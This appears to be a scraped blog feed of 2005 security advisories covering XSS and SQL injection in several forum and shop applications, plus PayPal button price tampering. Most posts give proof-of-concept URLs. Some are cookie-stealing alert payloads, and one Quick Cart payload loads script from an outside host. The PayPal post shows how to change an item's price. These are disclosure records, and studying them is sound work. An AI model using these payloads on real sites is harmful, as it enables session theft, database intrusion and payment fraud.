--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1121271553215924102005-07-14T09:17:00.000-07:002005-07-18T00:45:32.223-07:00class-1 Forum Software Cross site scripting#########################################################<br />class-1 Forum Software Cross site scripting.<br />Original advisore:http://lostmon.blogspot.com/2005/07/<br />class-1-forum-software-cross-site.html<br />Vendor url:http://www.class1web.co.uk/download_forum.php<br />Vendor notify: yes exploit available: yes<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=17920" target="_BLANK">17920</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=17921" target="_BLANK">17921</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=17922" target="_BLANK">17922</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=17923" target="_BLANK">17923</a><br />Secunia: <a href="http://secunia.com/advisories/16078/" target="_BLANK">SA16078</a><br />BID: <a href="http://securityfocus.com/bid/14261/" target="_BLANK">14261</a><br />Securitytracker: <a href="http://securitytracker.com/id?1014485" target="_BLANK">1014485</a> <a href="http://securitytracker.com/id?1014486" target="_BLANK">1014486</a><br />##########################################################<br /><br /><br />class-1 Forum Software is a PHP/MySQL driven web forum<br /><br />class-1 Forum contains a flaw that allows a remote cross site<br />scripting attack.This flaw exists because the application<br />does not validate 'viewuser_id' and 'group' variables upon <br />submission to 'users.php' script.This could allow a user to create<br />a specially crafted URL that would execute arbitrary code in a user's<br />browser within the trust relationship between the browser and <br />the server,leading to a loss of integrity<br /><br />##################<br />versions<br />##################<br /><br />class-1 Forum Software (v 0.23.2) vulnerable.<br />class-1 Forum Software (v 0.24.4) vulnerable.<br /><br />it is posible that other versions are vulnerables too.<br /><br />Clever Copy (http://clevercopy.bestdirectbuy.com/)<br />with forums module afected instaled. <br /><br />Clever Copy 2.0<br />Clever Copy 2.0a<br /><br />###################<br />Solution<br />###################<br /><br />no solution at this time.<br /><br />################<br />Timeline<br />################<br /><br />discovered: 10-07-2005<br />vendor notify: 12-07-2005 (Webform)<br />vendor response:<br />2 vendor response:12-07-2005 (Clever Copy)<br />disclosure: 14-07-2005<br /><br /><br />##############################<br />proof of Cross site Scripting<br />##############################<br /><br />http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=89[XSS-code]<br /><br />http://[victim]/forum/users.php?mode=viewgroup&group=Moderators[XSS-code]<br /><br /><br />#########################<br />posible SQL injections<br />#########################<br /><br />http://www.class1web.co.uk/forum/viewattach.php?id=[SQL-Injection]<br /><br />SQL Error <br />There was an error executing the query - SELECT * FROM attachments<br />WHERE attach_id='''<br />You have an error in your SQL syntax near ''''' at line 1 <br /><br />-------<br /><br />http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=[SQL-Injection]<br /><br />There was an error executing the query - SELECT * FROM users <br />WHERE user_id='''<br />You have an error in your SQL syntax near ''''' at line 1<br /><br />--------<br /><br />http://[victim]/forum/viewforum.php?mode=view&id=[SQL-Injection]<br /><br />There was an error executing the query - SELECT * FROM messages<br />WHERE id='''<br />You have an error in your SQL syntax near ''''' at line 1<br /><br />---------<br /><br />http://[victim]/forum/viewforum.php?forum=[SQL-Injection]<br /><br />There was an error executing the query - SELECT * FROM group_permissions<br />WHERE forum_id=''' AND forum_hidden='1' AND group_name='Standard Users'<br />You have an error in your SQL syntax near '1' AND group_name='Standard Users'' at line 1<br /><br />----------<br />#################### €nd ###########################<br /><br />Thnx to estrella to be my ligth<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1118888624732519662005-06-15T19:22:00.000-07:002005-07-12T01:07:04.460-07:00ATutor multiple variable Cross site scripting################################################<br />ATutor multiple variable Cross site scripting<br />vendor url:http://www.atutor.ca/atutor/download.php<br />ADVISORE:http://lostmon.blogspot.com/2005/06/<br />atutor-multiple-variable-cross-site.html<br />VENDOR NOTIFY: YES EXPLOIT AVAILABLE: YES<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=17351" target="_BLANK">17351</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=17352" target="_BLANK">17352</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=17353" target="_BLANK">17353</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=17354" target="_BLANK">17354</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=17355" target="_BLANK">17355</a><br /><a href="http://osvdb.org/displayvuln.php?osvdb_id=17356" target="_BLANK">17356</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=17357" target="_BLANK">17357</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=17358" target="_BLANK">17358</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=17359" target="_BLANK">17359</a>.<br />Secunia: <a href="http://secunia.com/advisories/15705/" target="_BLANK">SA15705</a><br />Securitytracker: <a href="http://securitytracker.com/id?1014216" target="_BLANK">1014216</a><br />BID: <a href="http://securityfocus.com/bid/13972" target="_BLANK">13972</a><br />################################################<br /><br />ATutor is an Open Source Web-based Learning Content<br />Management System (LCMS) designed with accessibility<br />and adaptability in mind.<br /><br />ATutor contains a flaw that allows a remote cross site<br />scripting attack.This flaw exists because the application<br />does not validate multiple variables upon submission<br />to multiple scripts. script.This could allow a user to <br />create a specially crafted URL that would execute<br />arbitrary code in a user's browser within the trust<br />relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br /><br />###########<br />versions:<br />###########<br /><br />ATutor 1.4.3 vulnerable<br />ATutor 1.5 RC 1 vulnerable<br />ATutor 1.5 RC 2 vulnerable<br />Atutor 1.5 RC 3 not tested<br /><br />#############<br />solution<br />#############<br /><br />Upgrade to version ATutor 1.5RC3 or higher, as it has been<br />reported to fix this vulnerability. An upgrade is required<br />as there are no known workarounds.<br /><br /><br />##############<br />timeline<br />##############<br /><br />discovered: 10-06-2005<br />vendor notify: 14-06-2005 (webform)<br />vendor response: 27-06-2005<br />disclosure: 16-06-2005<br /><br /><br />##################<br />Proof of concepts<br />##################<br /><br />http://[VICTIM]/ATutor/browse.php?cat=0&show_course=1[XSS-CODE]<br /><br />http://[VICTIM]/ATutor/contact.php?subject=[XSS-CODE]<br /><br />http://[VICTIM]/atutor/content.php?cid=323[XSS-CODE]<br /><br />http://[VICTIM]/atutor/inbox/send_message.php?l=1[XSS-CODE]<br /><br />http://[VICTIM]/atutor/search.php?search=10[XSS-CODE]<br />&words=kk&include=all&find_in=this&display_as=pages<br />&search=Search<br /><br />http://[VICTIM]/ATutor/search.php?search=1&words=aa[XSS-CODE]<br />&include=one&find_in=all&display_as=summaries&search=Search<br />#search_results<br /><br />http://[VICTIM]/ATutor/search.php?search=1&words=aa<br />&include=one[XSS-CODE]&find_in=all&display_as=<br />summaries&search=Search#search_results<br /><br />http://[VICTIM]/ATutor/search.php?search=1&words=aa<br />&include=one&find_in=all[XSS-CODE]&display_as=<br />summaries&search=Search#search_results<br /><br />http://[VICTIM]/ATutor/search.php?search=1&words=aa<br />&include=one&find_in=all&display_as=[XSS-CODE]<br />summaries&search=Search#search_results<br /><br />http://[VICTIM]/ATutor/search.php?search=1&words=aa<br />&include=one&find_in=all&display_as=summaries&search<br />=[XSS-CODE]Search#search_results<br /><br />http://[VICTIM]/ATutor/inbox/index.php?view=1[XSS-CODE]<br /><br />http://[VICTIM]/ATutor/tile.php?query=yy<br />&field=technicalFormat&submit=Search[XSS-CODE]<br /><br />http://[VICTIM]/ATutor/tile.php?query=[XSS-CODE]<br />&field=technicalFormat&submit=Search<br /><br />http://[VICTIM]/ATutor/tile.php?query=yy&<br />field=technicalFormat[XSS-CODE]&submit=Search<br /><br />http://[VICTIM]/ATutor/forum/subscribe_forum.php?<br />fid=2&us=1[XSS-CODE]<br /><br />http://[VICTIM]/ATutor/directory.php?roles%5B%5D=[XSS-CODE]<br />1&roles%5B%5D=2&roles%5B%5D=3&status=1&submit=Filter<br /><br />http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5<br />B%5D=[XSS-CODE]2&roles%5B%5D=3&status=1&submit=Filter<br /><br />http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B<br />%5D=2&roles%5B%5D=3[XSS-CODE]&status=1&submit=Filter<br /><br />http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B<br />%5D=2&roles%5B%5D=3&status=1[XSS-CODE]&submit=Filter<br /><br />http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B<br />%5D=2&roles%5B%5D=3&status=1&submit=Filter[XSS-CODE]<br /><br />http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&status=<br />2&reset_filter=Reset+Filter[XSS-CODE]<br /><br />http://[VICTIM]/ATutor/directory.php?roles[]=1[XSS-CODE]<br /><br />for exploting some flaws , need a client login.<br />Others scripts and others variables are vulnerable<br />to the same style attack.<br /><br /><br />############### €nd ##############<br /><br />Thnx to estrella to be my ligth<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1117192865642270292005-05-30T04:20:00.000-07:002005-05-30T08:14:48.696-07:00PayPal arbitrary price manipulation##############################################<br />PayPal 'butons' price manipulation.<br />vendor url:https://www.paypal.com/<br />http://lostmon.blogspot.com/2005/05/<br />paypal-arbitrary-price-manipulation.html<br />vendor notify: yes exploit available: yes<br />Discovered by FalconDeOro(1) and Lostmon(2) <br />##############################################<br /><br />PayPal buttons are prone to price manipulation.<br />all stores based on PayPal buttons are posible <br />vulnerables to this flaw.<br /><br /><br />##########################<br />code example of a button<br />##########################<br />the proof is based on this form:<br /><br />https://www.paypal.com/us/cgi-bin/webscr?cmd=p/xcl/rec/options-help-outside<br /><br />in the exmple of explotation we used "PayPal price manipulation kit " program to shop. <br />This is Non existent product...<br /><br />the link of the button for shopping have this url:<br />(1)<br />https://www.paypal.com/cgi-bin/webscr?cmd=_xclick<br />&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=19.90&no_shipping=1&return<br />=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15<br /><br /><br />this is the normal price for the product (19.90$) but... <br />if we change 'amount' variable to 0.01 the product now cost 0.01$<br /><br />https://www.paypal.com/cgi-bin/webscr?cmd=_xclick<br />&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=0.01&no_shipping=1&return<br />=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15<br /><br />another way to exploiting this situation:<br /><br />(2)<br />this other example coming from a stored based on paypal:<br /><br />https://www.paypal.com/cart/add=1&business=[EMAIL-Bussines]<br />&item_name=PayPal+price+manipulation+ kit&item_number=<br />7&return=[SITE SUBMIT]&cancel_return=[SITE RETURN]&amount=[PRICE]&shipping=0<br />&shipping2=0&handling=0&rm=2&custom=1¤cy_code=USD<br /><br />if we look we can change not only the price , we can change the email account<br />name of product, and other details.<br />for shopping you need an account on PayPal.<br /><br />#############<br />timeline:<br />#############<br /><br />discovered: 14 may 2005<br />vendor notify: 25 may 2005<br />Vendor response: 26 may 2005<br />disclosure: 27 may 2005<br />Public disclosure: 30 may 2005<br /><br /><br />################### End ####################<br /><br />thnx to estrella to be my ligth<br />thnx to icaro he is my support<br />Thnx to FalconDeOro ... patience.<br />thnx to all http://www.osvdb.org Team<br />thnx to all who day after day support me !!!<br /><br />contact to FalconDeOro<br />(falcondeoro@gmail.com)<br />http://falcondeoro.blogspot.com<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Data Mangler of: http://www.osvdb.org<br />--<br />La curiosidad es lo que hace mover la mente<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1117266681859103532005-05-29T00:50:00.000-07:002005-05-31T04:10:09.880-07:00Quick Cart Search field cross site scripting and script insercion#####################################################<br />Quick Cart Search field cross site scripting and script insercion<br />vendor url:http://www.quickcart.com/<br />advisore:http://lostmon.blogspot.com/2005/05/<br />quick-cart-search-field-cross-site.html<br />vendor notify: yes exploit available: yes<br />Securitytracker:<a href="http://securitytracker.com/id?1014076 " target="_BLANK">1014076</a><br />#####################################################<br /><br />Quick Cart contains a flaw that allows a remote cross<br />site scripting attack.This flaw exists because the<br />application does not validate the 'search' field upon<br />submission to 'search.cfm' script.This could allow a user<br />to create a specially crafted URL that would execute<br />arbitrary code in a user's browser within the trust<br />relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br /><br />############<br />versions<br />############<br /><br />free edition affected:<br />https://www.quickcart.com/qc_checkout.cfm<br /><br /><br />but is posible other versions ( standar or others) are afected<br /><br /><br />################<br />solution<br />################<br /><br />no solution was available at this time<br /><br />#############<br />Timeline<br />#############<br /><br />discovered: 10 may 2005<br />vendor notify: 27 may 2005<br />vendor response: 27 may 2005<br />disclosure: 29 may 2005<br /><br />##############<br />exploit<br />##############<br /><br />put in the search box of the store:<br /><br />//"><script>alert(document.cookie)</script><br /><br />or <br /><br />//"><SCRIPT src="http://www.drorshalev.com/dev/injection/js.js"></script> <br /><br />and the script is executing , this is a XSS flaw<br />and a posible script insercion<br /><br /><br />#################### €nd ###################<br /><br />Thnx to http://www.drorshalev.com for this script<br />and for hosting it for this demostration.<br /><br />thnx to estrella to be my ligth<br />thnx to all http://www.osvdb.org Team<br />thnx to all who day after day support me !!!<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Data Mangler of: http://www.osvdb.org<br />--<br />La curiosidad es lo que hace mover la mente<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1117067720081587062005-05-25T17:35:00.000-07:002005-05-28T00:16:13.570-07:00BookReview 1.0 multiple variable XSS###################################################<br />BookReview 1.0 multiple variable XSS<br />vendor url:http://www.readersunite.com<br />advisore:http://lostmon.blogspot.com/2005/05/<br />bookreview-10-multiple-variable-xss.html<br />vendor notify: yes exploit available: yes<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=16871" target="_BLANK">16871</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=16872" target="_BLANK">16872</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=16873" target="_BLANK">16873</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=16874" target="_BLANK">16874</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=16875" target="_BLANK">16875</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=16876" target="_BLANK">16876</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=16877" target="_BLANK">16877</a><br /><a href="http://osvdb.org/displayvuln.php?osvdb_id=16878" target="_BLANK">16878</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=16879" target="_BLANK">16879</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=16880" target="_BLANK">16880</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=16881" target="_BLANK">16881</a> <br />BID:<a href="http://securityfocus.com/bid/13783" target="_BLANK">13783</a><br />Securitytracker: <a href="http://securitytracker.com/id?1014058 " target="_BLANK">1014058</a> <br />###################################################<br /><br />BookReview contains a flaw that allows a remote cross<br />site scripting attack.This flaw exists because the <br />application does not validate multiple variables upon<br />submission to multiple scripts.This could allow a user<br />to create a specially crafted URL that would execute <br />arbitrary code in a user's browser within the trust<br />relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br />############<br />versions:<br />############<br /><br />BookReview beta 1.0 vulnerable.<br /><br />##############<br />solution<br />##############<br /><br />no solutions was available at this time<br /><br />###########<br />timeline<br />###########<br /><br />discovered: 27 april 2005<br />vendor notify 17 may 2005 (webform)<br />disclosure: 26 may 2005<br /><br />##################<br />proof of concepts<br />###################<br /><br />all files are submited to 'index.php' script by variable 'page' like <br />index.php?page=[NAME_OF_MODULE]&isbn=[NUMBER_OF_ISBN]<br />the name of module can be 'add_review' 'add_contents' or others<br /><br />for example this url:<br />http://[victim]/index.php?page=add_contents<br />&isbn=083081423X&chapters=25<br /><br />is the same of this :<br /><br />http://[victim]/add_contents.htm?isbn=083081423X&chapters=25<br /><br />whith this if you think we have two wais for exploiting this situation,<br />one whith the index.php and other directly by the module.<br /><br />##################<br />add_review.htm<br />#################<br /><br />http://[victim]/add_review.htm?isbn=0801052319&node=<br />%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true<br /><br />http://[victim]/add_review.htm?isbn=0801052319<br />%22%3E%3Cscript%3Ealert(document.cookie)%3C/script<br />%3E&node=Political_Science&review=true<br /><br />http://[victim]/add_review.htm?isbn=0553278223&node=<br />"><script>alert(document.cookie)</script>&review=true<br /><br />http://[victim]/add_review.htm?node=index&isbn=\"><script>alert(document.cookie)</script> <br /><br />###################<br />index.php<br />###################<br /><br />http://[victim]/index.php?page=add_contents&isbn=083081423X<br />%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25<br /><br />http://[victim]/index.php?page=add_contents&isbn=083081423X<br />&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E<br /><br />NICE ERROR !!<br /><br /><blockquote><br />; function tallyup() { var count = 0; var book = 0; var part = 0; var section = 0; var chapter = 0; var appendix = 0; var main_prefix = ""; var section_prefix = ""; for ( i=0; i var persian = '' + value; var roman=""; var ronumdashes=""; var buffer=10-persian.length; while (buffer>0) {persian="0"+persian;buffer--} var units=new Array("","I","II","III","IV","V","VI","VII","VIII","IX"); var tens=new Array("","X","XX","XXX","XL","L","LX","LXX","LXXX","XC"); var hundreds=new Array("","C","CC","CCC","CD","D","DC","DCC","DCCC","CM"); var thousands=new Array("","M","MM","MMM","MV","V","VM","VMM","VMMM","MX"); var billionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes=billionsdashes[persian.substring(0,1)]; var hundredmillionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes+=hundredmillionsdashes[persian.substring(1,2)]; var tenmillionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes+=tenmillionsdashes[persian.substring(2,3)]; var millionsdashes=new Array("","_","__","___","_=","=","=_","=__","=___","_="); romandashes+=millionsdashes[persian.substring(3,4)]; var hundredthousandsdashes=new Array("","_","__","___","__","_","__","___","____","__"); romandashes+=hundredthousandsdashes[persian.substring(4,5)]; var tenthousandsdashes=new Array("","_","__","___","__","_","__","___","____","__"); romandashes+=tenthousandsdashes[persian.substring(5,6)]; var thousandsdashes=new Array("","","",""," _","_","_","_","_"," _"); romandashes+=thousandsdashes[persian.substring(6,7)]; roman=thousands[persian.substring(0,1)]; roman+=hundreds[persian.substring(1,2)]; roman+=tens[persian.substring(2,3)]; roman+=thousands[persian.substring(3,4)]; roman+=hundreds[persian.substring(4,5)]; roman+=tens[persian.substring(5,6)]; roman+=thousands[persian.substring(6,7)]; roman+=hundreds[persian.substring(7,8)]; roman+=tens[persian.substring(8,9)]; roman+=units[persian.substring(9,10)]; return roman; } function alphabetise(number) { return String.fromCharCode(64+number); } /// function submitconfirm() { var agree = document.getElementById('agree'); if ( !agree.checked ) { alert("You must indicate your agreement to the terms and conditions by checking the box provided."); return false; } return true; }<br /></blockquote><br /><br />###################<br />add_contents.htm<br />###################<br /><br /><br />http://[victim]/add_contents.htm?isbn=083081423X<br />%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E<br /><br />http://[victim]/suggest_category.htm?node=Agriculture<br />%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E<br /><br />http://[victim]/contact.htm?user=admin<br />%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E<br /><br />http://[victim]/add_booklist.htm?node=Agriculture_and_Aqua<br />culture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E<br /><br /><br />#########################<br />others.<br />#########################<br /><br />http://[victim]/add_url.htm?node=<br />%3Cscript%3Ealert(document.cookie)%3C/script%3E<br /><br />http://[victim]/search.htm?page=search&submit%5Bstring<br />%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29<br />%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author<br /><br />http://[victim]/add_classification.htm?isbn=0830815961<br />%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels<br /><br />http://[victim]/suggest_review.htm?node=Business_and_Economics<br />"><script>alert(document.cookie)</script> <br /><br />############################<br />posible local fle inclusion<br />############################<br /><br />http://[victim]/suggestions/"><<br />script>alert(document.cookie)</script> .htm<br /><br />http://[victim]/directory/">%3Cscript%3<br />Ealert(document.cookie)%3C/script%3E.htm<br /><br /><br /><br />################<br />path disclosure:<br />################<br /><br />http://[victim]/search.htm?page=search&submit%5Bstring%<br />5D=&submit=Ok&submit%5Btype%5D=auth<br />or<br /><br />http://[victim]/search.htm?page=search&submit%5<br />Bstring%5D=&submit%5Btype%5D=title<br /><br />######################## €nd ########################<br /><br />thnx to estrella to be my ligth<br />Thnx to icaro he is my Shadow !!!<br />thnx to all http://www.osvdb.org Team<br />thnx to all who day after day support me !!!<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Data Mangler of: http://www.osvdb.org<br />--<br />La curiosidad es lo que hace mover la mente<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1116936994125178902005-05-24T05:15:00.000-07:002005-05-25T17:42:21.703-07:00Spread The Word multiple XSS and SQL injections####################################################<br />Spread The Word (comersus based bookstore ) multiple<br />script and variables XSS and SQL Injections vulnerabilities.<br />vendor url:http://www.stwm.com/opportunity.asp<br />advisore url:http://lostmon.blogspot.com/2005/05/<br />spread-word-multiple-xss-and-sql.html<br />vendor notified:yes exploit available: yes<br />BID:<a href="http://securityfocus.com/bid/13733" target="_BLANK">13733</a> and <a href="http://securityfocus.com/bid/13737" target="_BLANK">13737</a><br />####################################################<br /><br />Spread The Word (comersus based bookstore ) contains a flaw that <br />allows a remote cross site scripting attack.This flaw exists because<br />the application does not validate multiple variables upon submission<br />to multiple scripts.This could allow a user to create a specially <br />crafted URL that would execute arbitrary code in a user's browser <br />within the trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br /><br />##############<br />versions:<br />##############<br /><br /> I can´t established what version are affected.<br /><br />##############<br />solution:<br />##############<br /><br />no solution was available at this time.<br /><br />##############<br />timeline<br />##############<br /><br />discovered: 17 oct 2004<br />vendor notify: 08 april 2005 <br />vendor response: 11 april 2005<br />disclosure: 24 may 2005<br /><br /><br /><br />####################<br />proof of concepts:<br />####################<br /><br />Some files have diferent prefix like STW<br />ej: 'ShowContent.asp' in others stores are 'STWShowContent.asp'<br /><br />#####################<br />BrowseCategories.asp<br />#####################<br /><br />XSS,sql errors and path disclosure.<br /><br /><br />http://[target]/store/BrowseCategories.asp?Cat0=783&<br />Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible[XSS-here]<br /><br />http://[target]/store/BrowseCategories.asp?Cat0=783<br />&Cat0Literal=Gifts&Cat1=839[XSS-here]&Cat1Literal=Bible<br /><br />http://[target]/store/BrowseCategories.asp?Cat0=783<br />&Cat0Literal=Gifts[XSS-here]&Cat1=839&Cat1Literal=Bible<br /><br />http://[target]/store/BrowseCategories.asp?Cat0=783[XSS-here]<br />&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible<br /><br />http://[target]/store/BrowseCategories.asp?Cat0=783[SQL-INJECTION]<br />&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible<br /><br />http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=<br />Gifts&Cat1=839[SQL-INJECTION]&Cat1Literal=Bible<br /><br />Cat0literal can be books, videos,gifts,bibles,or other categories similars listed in the cart.<br /><br />#############<br />search.asp <br />#############<br /><br />XSS,sql errors and path disclosure.<br /><br />http://[target]/store/Search.asp?SearchType=565<br />[SQL-INJECTION]&strSearch=lalala<br /><br />http://[target]/store/Search.asp?InStock=[XSS-here]<br />&SearchType=783&strSearch=i&SearchCat1=-1&SearchCat2=<br />-1&PriceMin=&PriceMax=&PublicationDate=-1<br /><br />http://[target]/store/Search.asp?InStock=&SearchType=<br />783&strSearch=[XSS-here]&SearchCat1=-1&SearchCat2=<br />-1&PriceMin=&PriceMax=&PublicationDate=-1<br /><br />http://[target]/store/Search.asp?InStock=&SearchType=783<br />&strSearch=lol&SearchCat1=-1[XSS-here]&SearchCat2=-1<br />&PriceMin=&PriceMax=&PublicationDate=-1<br /><br />http://[target]/store/Search.asp?InStock=&SearchType=783<br />&strSearch=lol&SearchCat1=-1&SearchCat2=-1[XSS-here]&<br />PriceMin=&PriceMax=&PublicationDate=-1<br /><br />http://[target]/store/Search.asp?InStock=&SearchType=783<br />&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=<br />[XSS-here]&PriceMax=&PublicationDate=-1<br /><br />http://[target]/store/Search.asp?InStock=&SearchType=783<br />&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=<br />&PriceMax=[XSS-here]&PublicationDate=-1<br /><br />http://[target]/store/Search.asp?InStock=&SearchType=783<br />&strSearch=1&SearchCat1=-1&SearchCat2=-1&PriceMin=<br />&PriceMax=&PublicationDate='<br /><br />##################<br />AdvancedSearch.asp<br />##################<br /><br />http://[target]/store/AdvancedSearch.asp?strSearch=<br />[XSS-CODE]&SearchType=-1&SearchCat1=-1&SearchCat2=<br />-1&Author=dd&PublicationDate=-1&PriceMin=1&PriceMax=<br />111111111&B1=Submit<br /><br /><br />##################<br />ViewItem.asp<br />##################<br /><br />XSS,sql errors and path disclosure.<br /><br />http://[target]/store/ViewItem.asp?ISBN=<br />0789906651[XSS-here]&Cat0=565<br /><br />http://[target]/store/ViewItem.asp?ISBN=<br />0789906651&Cat0=565[XSS-here]<br /><br />http://[target]/store/ViewItem.asp?ISBN=<br />0789906651[SQL-INJECTION]&Cat0=565<br /><br />http://[target]/store/ViewItem.asp?ISBN=0789906651<br />&Cat0=565[SQL-INJECTION]<br /><br /><br /><br />####################<br />STWShowContent.asp<br />###################<br />XSS ,sql errors and path disclosure.<br /><br /><br />http://[target]/store/STWShowContent.asp?<br />idRightPage=13032[XSS-CODE]<br /><br />http://[target]/store/STWShowContent.asp?<br />idRightPage=13032[SQL-INJECTION]<br /><br />http://[target]/store/STWShowContent.asp <br /><br />###################<br />MySide.Asp<br />###################<br />XSS,sql errors and path disclosure.<br /><br /><br />http://[target]/store/MySide.Asp?Cat0=565<br />&Cat0Literal=Bibles[XSS-CODE]<br /><br />http://[target]/store/MySide.Asp?Cat0=565<br />[SQL-INJECTION]&Cat0Literal=Bibles<br /><br />#################<br />BrowseMain.asp<br />#################<br />XSS ,sql errors and path disclosure.<br /><br />http://[target]/store/BrowseMain.asp?Cat0=565<br />[XSS-CODE]&Cat0Literal=Bibles&CurHigh=4<br /><br />http://[target]/store/BrowseMain.asp?Cat0=565<br />&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4<br /><br />http://[target]/store/BrowseMain.asp?Cat0=565<br />[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4<br /><br />http://[target]/store/BrowseMain.asp?Cat0=783<br />&Cat0Literal=Gifts&CurHigh=3"><<br />script>alert(document.cookie)</script><br /><br />################<br />others<br />################<br />XSS <br /><br />http://[target]/store/NewCustomer.asp?newemail=<br />zzzz@lalala.es&RedirectURL=[XSS-CODE]<br /><br />http://[target]/store/Login.asp?RedirectURL=[XSS-code]<br /><br />Also it´s posible to we can inject sql or XSS code in 'Cat0' variable<br />or 'Cat1' in all files where this variables are used.<br /><br />Also it´s posible to we can inject XSS code in 'Cat0literal' variable<br />or 'Cat1literal' in all files where this variables are used.<br /><br />################### End ################<br /><br />thnx to estrella to be my ligth<br />Thnx to icaro he is my Shadow !!!<br />thnx to all http://www.osvdb.org Team<br />thnx to all who day after day support me !!!<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Data Mangler of: http://www.osvdb.org<br />--<br />La curiosidad es lo que hace mover la mente<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
